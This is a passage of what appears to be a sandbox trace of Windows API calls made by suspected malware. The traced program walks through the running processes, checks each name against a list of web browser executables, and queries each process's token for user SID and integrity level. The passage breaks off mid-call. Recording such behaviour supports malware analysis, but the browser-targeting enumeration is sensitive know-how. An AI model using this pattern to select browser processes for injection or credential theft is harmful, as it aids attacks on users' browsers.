[0222.962] CloseHandle (hObject=0xb8) returned 1 [0222.962] CloseHandle (hObject=0xb4) returned 1 [0222.962] lstrcmpiW (lpString1="firefox.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0222.962] lstrcmpiW (lpString1="chrome.exe", lpString2="filesdetectedlosebenjamin.exe") returned -1 [0222.962] lstrcmpiW (lpString1="opera.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0222.962] lstrcmpiW (lpString1="iexplore.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0222.962] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0222.962] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0222.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0xb4 [0222.962] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0222.962] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0222.963] GetLastError () returned 0x7a [0222.963] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0222.963] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0222.963] CloseHandle (hObject=0xb8) returned 1 [0222.963] CloseHandle (hObject=0xb4) returned 1 [0222.963] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0xb4 [0222.963] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167138, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.963] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0222.963] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0222.963] GetLastError () returned 0x7a [0222.963] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0222.963] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0222.964] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0222.964] CloseHandle (hObject=0xb8) returned 1 [0222.964] CloseHandle (hObject=0xb4) returned 1 [0222.964] lstrcmpiW (lpString1="firefox.exe", lpString2="cincinnati consumers se.exe") returned 1 [0222.964] lstrcmpiW (lpString1="chrome.exe", lpString2="cincinnati consumers se.exe") returned -1 [0222.964] lstrcmpiW (lpString1="opera.exe", lpString2="cincinnati consumers se.exe") returned 1 [0222.964] lstrcmpiW (lpString1="iexplore.exe", lpString2="cincinnati consumers se.exe") returned 1 [0222.964] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="cincinnati consumers se.exe") returned 1 [0222.964] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="cincinnati consumers se.exe") returned 1 [0222.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0xb4 [0222.964] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0222.964] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0222.964] GetLastError () returned 0x7a [0222.964] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0222.964] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0222.965] CloseHandle (hObject=0xb8) returned 1 [0222.965] CloseHandle (hObject=0xb4) returned 1 [0222.965] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0xb4 [0222.965] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167270, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.965] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0222.965] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0222.965] GetLastError () returned 0x7a [0222.965] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0222.965] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0222.965] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0222.965] CloseHandle (hObject=0xb8) returned 1 [0222.965] CloseHandle (hObject=0xb4) returned 1 [0222.966] lstrcmpiW (lpString1="firefox.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0222.966] lstrcmpiW (lpString1="chrome.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0222.966] lstrcmpiW (lpString1="opera.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0222.966] lstrcmpiW (lpString1="iexplore.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0222.966] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0222.966] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0222.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0xb4 [0222.966] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0222.966] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0222.966] GetLastError () returned 0x7a [0222.966] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0222.966] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0222.966] CloseHandle (hObject=0xb8) returned 1 [0222.966] CloseHandle (hObject=0xb4) returned 1 [0222.967] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0xb4 [0222.967] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1673a0, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.967] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0222.967] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0222.967] GetLastError () returned 0x7a [0222.967] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0222.967] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0222.967] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0222.967] CloseHandle (hObject=0xb8) returned 1 [0222.967] CloseHandle (hObject=0xb4) returned 1 [0222.967] lstrcmpiW (lpString1="firefox.exe", lpString2="medicaid.exe") returned -1 [0222.967] lstrcmpiW (lpString1="chrome.exe", lpString2="medicaid.exe") returned -1 [0222.967] lstrcmpiW (lpString1="opera.exe", lpString2="medicaid.exe") returned 1 [0222.967] lstrcmpiW (lpString1="iexplore.exe", lpString2="medicaid.exe") returned -1 [0222.967] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="medicaid.exe") returned 1 [0222.967] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="medicaid.exe") returned 1 [0222.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0xb4 [0222.968] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0222.968] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0222.968] GetLastError () returned 0x7a [0222.968] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0222.968] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0222.968] CloseHandle (hObject=0xb8) returned 1 [0222.968] CloseHandle (hObject=0xb4) returned 1 [0222.968] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0xb4 [0222.968] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1674e0, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.968] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0222.968] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0222.968] GetLastError () returned 0x7a [0222.968] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0222.968] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0222.968] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0222.968] CloseHandle (hObject=0xb8) returned 1 [0222.969] CloseHandle (hObject=0xb4) returned 1 [0222.969] lstrcmpiW (lpString1="firefox.exe", lpString2="gateway.exe") returned -1 [0222.969] lstrcmpiW (lpString1="chrome.exe", lpString2="gateway.exe") returned -1 [0222.969] lstrcmpiW (lpString1="opera.exe", lpString2="gateway.exe") returned 1 [0222.969] lstrcmpiW (lpString1="iexplore.exe", lpString2="gateway.exe") returned 1 [0222.969] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="gateway.exe") returned 1 [0222.969] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="gateway.exe") returned 1 [0222.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0xb4 [0222.969] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0222.969] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0222.969] GetLastError () returned 0x7a [0222.969] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0222.969] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0222.969] CloseHandle (hObject=0xb8) returned 1 [0222.969] CloseHandle (hObject=0xb4) returned 1 [0222.969] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0xb4 [0222.969] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1675f8, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.969] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0222.970] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0222.970] GetLastError () returned 0x7a [0222.970] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0222.970] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0222.970] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0222.970] CloseHandle (hObject=0xb8) returned 1 [0222.970] CloseHandle (hObject=0xb4) returned 1 [0222.970] lstrcmpiW (lpString1="firefox.exe", lpString2="laden.exe") returned -1 [0222.970] lstrcmpiW (lpString1="chrome.exe", lpString2="laden.exe") returned -1 [0222.970] lstrcmpiW (lpString1="opera.exe", lpString2="laden.exe") returned 1 [0222.970] lstrcmpiW (lpString1="iexplore.exe", lpString2="laden.exe") returned -1 [0222.970] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="laden.exe") returned 1 [0222.970] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="laden.exe") returned 1 [0222.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0xb4 [0222.970] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0222.970] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0222.970] GetLastError () returned 0x7a [0222.970] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0222.970] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0222.971] CloseHandle (hObject=0xb8) returned 1 [0222.971] CloseHandle (hObject=0xb4) returned 1 [0222.971] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0xb4 [0222.971] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167708, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.971] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0222.971] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0222.971] GetLastError () returned 0x7a [0222.971] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0222.971] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0222.971] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0222.971] CloseHandle (hObject=0xb8) returned 1 [0222.971] CloseHandle (hObject=0xb4) returned 1 [0222.971] lstrcmpiW (lpString1="firefox.exe", lpString2="lying-yourself.exe") returned -1 [0222.971] lstrcmpiW (lpString1="chrome.exe", lpString2="lying-yourself.exe") returned -1 [0222.971] lstrcmpiW (lpString1="opera.exe", lpString2="lying-yourself.exe") returned 1 [0222.971] lstrcmpiW (lpString1="iexplore.exe", lpString2="lying-yourself.exe") returned -1 [0222.972] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="lying-yourself.exe") returned 1 [0222.972] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="lying-yourself.exe") returned 1 [0222.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0xb4 [0222.972] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0222.972] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0222.972] GetLastError () returned 0x7a [0222.972] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0222.972] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0222.972] CloseHandle (hObject=0xb8) returned 1 [0222.972] CloseHandle (hObject=0xb4) returned 1 [0222.972] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0xb4 [0222.972] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167818, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.972] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0222.972] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0222.972] GetLastError () returned 0x7a [0222.972] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0222.972] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0222.972] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0222.972] CloseHandle (hObject=0xb8) returned 1 [0222.972] CloseHandle (hObject=0xb4) returned 1 [0222.973] lstrcmpiW (lpString1="firefox.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0222.973] lstrcmpiW (lpString1="chrome.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned -1 [0222.973] lstrcmpiW (lpString1="opera.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0222.973] lstrcmpiW (lpString1="iexplore.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0222.973] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0222.973] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0222.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0xb4 [0222.973] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0222.973] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0222.973] GetLastError () returned 0x7a [0222.973] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0222.973] GetTokenInformation 